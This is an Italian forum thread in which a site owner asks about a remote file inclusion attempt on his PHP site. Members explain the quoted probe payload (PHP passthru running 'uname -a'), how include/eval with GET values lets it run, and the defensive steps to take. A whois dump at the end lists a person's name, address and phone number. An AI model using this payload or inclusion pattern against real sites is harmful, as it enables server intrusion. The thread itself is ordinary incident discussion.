Ragazzi, ho beccato uno che stava visitando il mio sito, e compariva come se fosse nella pagina:
http://wwww.miosito.it/azione.php?op...17.59.104.226/
Che ovviamente non esiste....
sono andato all'ip riportato in quel link.... e mi ritrovo, visibile, questo codice php...
<? echo "\nbl3" . 'bl3 ' ; passthru("uname -a") ; ?>
Sapete dirmi che significa? E magari, se era un modo per bucare il sito?
Grazzzie
Che le ali della libertà non perdano mai le piume...
Gesù salva, Buddha fa backups incrementali.
comincio a rispondermi solo.... passthru() esegue un comando esterno come exec(), quindi credo proprio sia un modo per bucare...
Mi illuminate sul resto del codice? Grazziee
Che le ali della libertà non perdano mai le piume...
Gesù salva, Buddha fa backups incrementali.
passthru("uname -a") ;Originariamente inviato da Jack Barton
comincio a rispondermi solo.... passthru() esegue un comando esterno come exec(), quindi credo proprio sia un modo per bucare...
Mi illuminate sul resto del codice? Grazziee
uname -a chiede tutte le info riguardo la tua macchina...
tipo di macchina, di release OS, network....
Un craker lo usa per capire con che cosa/chi ha a che fare ed applicare poi un adeguato programma per "bucare".
Oggi va di moda usare il pc altrui per lo spam. Converrebbe togliere i permessi di lettura ad uname o cancellarlo proprio, tanto tu sai con che macchina hai a che fare. Giusto?
Il silenzio è spesso la cosa migliore. Pensa ... è gratis.
il codice è tanto semplice quanto strano ,
questo manda in outputcodice:echo "\nbl3" . 'bl3 '
mentrecodice:bl3bl3
ottiene alcune ingo sull'OS di php , ad esempio nel mio unix restituisce questa stringa,codice:passthru("uname -a")
ti consiglio di tenere sotto controllo il tuo server nei prossimi giorni...codice:Darwin p-dan.local 7.4.0 Darwin Kernel Version 7.4.0: Wed May 12 16:58:24 PDT 2004; root:xnu/xnu-517.7.7.obj~7/RELEASE_PPC Power Macintosh powerpc
Bye
PyFanatics
Azz.... ma per far ciò suppongo che ci sia bisogno di accedere al server? io sono in hosting presso aru.... , mi sa che non posso far nulla, o sbaglio?Converrebbe togliere i permessi di lettura ad uname o cancellarlo proprio, tanto tu sai con che macchina hai a che fare. Giusto?
Mi sa che posso solo pregareti consiglio di tenere sotto controllo il tuo server nei prossimi giorni...!!
Comunque, a cosa strana, è che la pagina conteneva quel codice php, non interpretato, come se lo spazio web su cui risiede la pagina, non interpretasse il php... così il codice è inutilizzabile giusto?
Che le ali della libertà non perdano mai le piume...
Gesù salva, Buddha fa backups incrementali.
Non ti succede niente, stai tranquillo
Se sei con un hoster affidabile nessuno mai ti butterà giù il server, a meno che lo distrugga fisicamente a mazzate!
Scrivi comunque ad Aruba (Se ho capito bene..) e segnala il problema.
Ciao!
![L'avatar di }gu|do[z]{®©](image.php?u=17713&dateline=1210448886 "L'avatar di }gu|do[z]{®©")
beh che vuol dire... magari ha dati sensibili da qualche parte... mica si preoccupa solo per defacement e simili.. quelli sono solo un fastidio.. ma niente di che...Originariamente inviato da phoenixweb
Non ti succede niente, stai tranquillo
Se sei con un hoster affidabile nessuno mai ti butterà giù il server, a meno che lo distrugga fisicamente a mazzate!
Scrivi comunque ad Aruba (Se ho capito bene..) e segnala il problema.
Ciao!
per interpretare quel codice devi passarlo ad eval() o includerlo con require() o include , evita quindi di usare quelle funzioni con valori presi da GET...
tienici aggiornati
PyFanatics
Per questo non c'è problema, non faccio cose simili...per interpretare quel codice devi passarlo ad eval() o includerlo con require() o include , evita quindi di usare quelle funzioni con valori presi da GET...
Cmq dite una preghierina pure per me!!! Vi tengo informati se succede qualcosa, per ora ho bannato l'ip dell'aspirante criminale.... speriamo che non si ripresenti....
:
Che le ali della libertà non perdano mai le piume...
Gesù salva, Buddha fa backups incrementali.
Sbaglio o mi sa di "sfottò"?? "ble ble"Originariamente inviato da Pasco
il codice è tanto semplice quanto strano ,
questo manda in outputcodice:echo "\nbl3" . 'bl3 '
codice:bl3bl3
Comunque whoisando quell'ip:
codice:Request: 217.59.104.226 connected to whois.arin.net [192.149.252.43:43] ... connected to whois.ripe.net [193.0.0.135:43] ... % This is the RIPE Whois server. % The objects are in RPSL format. % % Rights restricted by copyright. % See http://www.ripe.net/ripencc/pub-serv...copyright.html inetnum: 217.59.104.224 - 217.59.104.231 netname: MARIND descr: MARIND country: IT admin-c: GG10175-RIPE tech-c: GG10175-RIPE status: ASSIGNED PA notify: network@cgi.interbusiness.it mnt-by: INTERB-MNT changed: network@cgi.interbusiness.it 20010327 source: RIPE route: 217.56.0.0/14 descr: INTERBUSINESS origin: AS3269 remarks: Send report of network abuse/spam remarks: only to: abuse@interbusiness.it . remarks: If you report abuse to any other address remarks: you will get no response. notify: network@cgi.interbusiness.it mnt-by: INTERB-MNT changed: mattu@cgi.interbusiness.it 20011009 source: RIPE person: Giuseppe Ghiani address: MARIND address: v.le monastir km. 6.450 address: I- 09032 assemini ca address: Italy phone: +39 070941227 fax-no: +39 070946919 nic-hdl: GG10175-RIPE changed: domain@cgi.interbusiness.it 20010327 source: RIPE
Permessi di invio
Rispondi quotando